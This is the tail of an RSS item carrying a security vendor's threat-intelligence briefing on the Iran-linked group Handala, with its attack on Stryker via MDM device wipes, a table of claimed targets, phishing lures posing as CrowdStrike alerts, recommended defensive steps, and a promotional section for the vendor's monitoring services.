   &lt;th style="width: 38%;"&gt;Target&lt;/th&gt; 
   &lt;th style="width: 37%;"&gt;Attack Type&lt;/th&gt; 
   &lt;th style="width: 25%;"&gt;Status&lt;/th&gt; 
  &lt;/tr&gt; 
 &lt;/thead&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Stryker&lt;/strong&gt; (US, $131B)&lt;/td&gt; 
   &lt;td&gt;Wiper + 50TB data theft&lt;/td&gt; 
   &lt;td&gt;&lt;strong style="color: #f2673a;"&gt;CONFIRMED&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Verifone&lt;/strong&gt; (US payment)&lt;/td&gt; 
   &lt;td&gt;Data breach claimed&lt;/td&gt; 
   &lt;td&gt;&lt;strong style="color: #315068;"&gt;DISPUTED&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Academy of Hebrew Language&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Defacement + psyop&lt;/td&gt; 
   &lt;td&gt;&lt;strong style="color: #f2673a;"&gt;CONFIRMED&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Israeli financial sector&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;DDoS — 1.2M req/sec&lt;/td&gt; 
   &lt;td&gt;&lt;strong style="color: #f2673a;"&gt;CONFIRMED&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Jordan fuel systems&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Infrastructure sabotage&lt;/td&gt; 
   &lt;td&gt;&lt;strong style="color: #979da0;"&gt;CLAIMED&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Bank of Jordan, UAE &amp;amp; Saudi airports&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Disruption&lt;/td&gt; 
   &lt;td&gt;&lt;strong style="color: #979da0;"&gt;CLAIMED&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;Iranian-American/Canadian influencers&lt;/strong&gt;&lt;/td&gt; 
   &lt;td&gt;Death threats + dox&lt;/td&gt; 
   &lt;td&gt;&lt;strong style="color: #f2673a;"&gt;CONFIRMED&lt;/strong&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;h2&gt;“RedWanted”: The Public Target List&lt;/h2&gt; 
&lt;p&gt;On March 1, 2026, Handala launched &lt;strong&gt;RedWanted&lt;/strong&gt; — a public hit list naming individuals and organizations designated as supporters of Israel, with an explicit declaration that they will hunt every listed target. If your organization has Israeli business ties, US government contracts, or operates in healthcare, energy, financial services, or technology, assume you may be on or near this list.&lt;/p&gt; 
&lt;h2&gt;Declared Future Targets&lt;/h2&gt; 
&lt;p&gt;The IRGC formally declared US and Israeli-linked banks and economic centers as legitimate military targets. Iranian state media named the following American companies:&lt;/p&gt; 
&lt;div class="v-key-quote"&gt; 
 &lt;p&gt;Google&lt;br&gt;Microsoft&lt;br&gt;Nvidia&lt;/p&gt; 
&lt;/div&gt; 
&lt;p&gt;Handala’s own statement following the Stryker attack: &lt;em&gt;"This is only the beginning of a new chapter in cyber warfare."&lt;/em&gt;&lt;/p&gt; 
&lt;h2&gt;Active Secondary Threat: CrowdStrike Phishing Lures&lt;/h2&gt; 
&lt;p&gt;Handala has a documented pattern of deploying fake CrowdStrike security alert emails immediately following high-profile security events — sending spoofed remediation emails that deliver wiper malware to targets who click.&lt;/p&gt; 
&lt;div class="v-alert"&gt; 
 &lt;p&gt;&lt;strong&gt;Immediate action required:&lt;/strong&gt; Instruct all staff that any unexpected email from CrowdStrike, Microsoft, or any security vendor requesting a download or remediation action must be verified by calling the vendor directly at a known, pre-existing number. Do not click links. Do not download attachments. The more urgent it feels, the more suspicious you should be.&lt;/p&gt; 
&lt;/div&gt; 
&lt;h2&gt;Recommended Actions&lt;/h2&gt; 
&lt;h3&gt;Immediate — Next 24 to 48 Hours&lt;/h3&gt; 
&lt;table&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;1. Audit MDM admin access.&lt;/strong&gt; Review who holds Intune or MDM administrative credentials. Apply least-privilege immediately. Enable MFA on all admin accounts if not already active.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;2. Verify CrowdStrike communications.&lt;/strong&gt; Brief your security team and IT helpdesk. No vendor-sourced instructions should be acted upon without out-of-band verification.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;3. Assess Stryker device exposure.&lt;/strong&gt; If your organization uses any Stryker or Physio-Control connected equipment, determine current connectivity status and isolation posture.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;4. Review DoD and Israeli contractor relationships.&lt;/strong&gt; If you are a vendor or subcontractor in either of these supply chains, elevate your threat posture now.&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;h3&gt;Near-Term — Next 30 Days&lt;/h3&gt; 
&lt;table&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;5. Wiper resilience audit.&lt;/strong&gt; Validate offline backup integrity. Wiper attacks leave no recovery path without clean, air-gapped backups.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;6. Phishing simulation using security vendor themes.&lt;/strong&gt; Run a targeted test using CrowdStrike and Microsoft-themed lures to identify vulnerable personnel before Handala does.&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td&gt;&lt;strong&gt;7. Incident response plan review.&lt;/strong&gt; Does your IR plan account for MDM compromise as an initial attack vector? If not, it needs to.&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;h2&gt;How Vigilant Addresses This Threat&lt;/h2&gt; 
&lt;p&gt;The Stryker attack succeeded for one fundamental reason: nobody saw it happening in real time. By the time employees watched their screens go dark, the wipe command had already executed across 200,000 devices.&lt;/p&gt; 
&lt;p&gt;Perimeter defenses and endpoint agents alone do not catch MDM-layer administrative abuse. Vigilant’s sensor technology is deployed deep inside client environments, monitoring not just endpoints but the management planes, authentication layers, and administrative tooling that Handala specifically targeted:&lt;/p&gt; 
&lt;table class="v-aligned-services-table" style="border-width: 0px; border-style: solid;"&gt; 
 &lt;tbody&gt; 
  &lt;tr&gt; 
   &lt;td style="padding: 0px;"&gt;Anomalous MDM policy push activity, including bulk enrollment changes or device wipe commands outside of normal administrative patterns&lt;br&gt;&lt;span class="v-service-chip"&gt;Aligned Service: Managed Defender&lt;/span&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td class="v-service-gap" style="padding: 0px;"&gt;&amp;nbsp;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td style="padding: 0px;"&gt;Credential abuse at the management layer — privileged account activity inconsistent with established baselines&lt;br&gt;&lt;span class="v-service-chip"&gt;Aligned Service: Managed Defender&lt;/span&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td class="v-service-gap" style="padding: 0px;"&gt;&amp;nbsp;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td style="padding: 0px;"&gt;Mass authentication events at a scale that generates detectable signals well before execution&lt;br&gt;&lt;span class="v-service-chip"&gt;Aligned Service: Managed Defender&lt;/span&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td class="v-service-gap" style="padding: 0px;"&gt;&amp;nbsp;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td style="padding: 0px;"&gt;Suspicious Microsoft 365 activity — including anomalous OAuth application consent grants, mail forwarding rule changes, and administrative role escalation events outside of authorized change windows&lt;br&gt;&lt;span class="v-service-chip"&gt;Aligned Service: V365&lt;/span&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td class="v-service-gap" style="padding: 0px;"&gt;&amp;nbsp;&lt;/td&gt; 
  &lt;/tr&gt; 
  &lt;tr&gt; 
   &lt;td style="padding: 0px;"&gt;Lateral movement through Microsoft cloud management infrastructure and Organization Network — a monitored vector in our CyberDNA Platform&lt;br&gt;&lt;span class="v-service-chip"&gt;Aligned Service: Managed Defender &amp;amp; CyberDNA MNDR&lt;/span&gt;&lt;/td&gt; 
  &lt;/tr&gt; 
 &lt;/tbody&gt; 
&lt;/table&gt; 
&lt;div class="v-key-quote"&gt; 
 &lt;p&gt;The difference between a detection event and a disaster is visibility. That is what we provide.&lt;/p&gt; 
&lt;/div&gt;  
&lt;img src="https://track.hubspot.com/__ptq.gif?a=45116655&amp;amp;k=14&amp;amp;r=https%3A%2F%2Fvigilantdefense.com%2Fresearch%2Fintel-briefing-sitrep-stryker-attack&amp;amp;bu=https%253A%252F%252Fvigilantdefense.com%252Fresearch&amp;amp;bvt=rss" alt="" width="1" height="1" style="min-height:1px!important;width:1px!important;border-width:0!important;margin-top:0!important;margin-bottom:0!important;margin-right:0!important;margin-left:0!important;padding-top:0!important;padding-bottom:0!important;padding-right:0!important;padding-left:0!important; "&gt;</content:encoded>
      <category>Stryker</category>
      <category>Iran</category>
      <pubDate>Fri, 13 Mar 2026 22:00:54 GMT</pubDate>
      <author>sales@vigilantnow.com (Chris Nyhuis)</author>
      <guid>https://vigilantdefense.com/research/intel-briefing-sitrep-stryker-attack</guid>
      <dc:date>2026-03-13T22:00:54Z</dc:date>
    </item>
  </channel>
</rss>
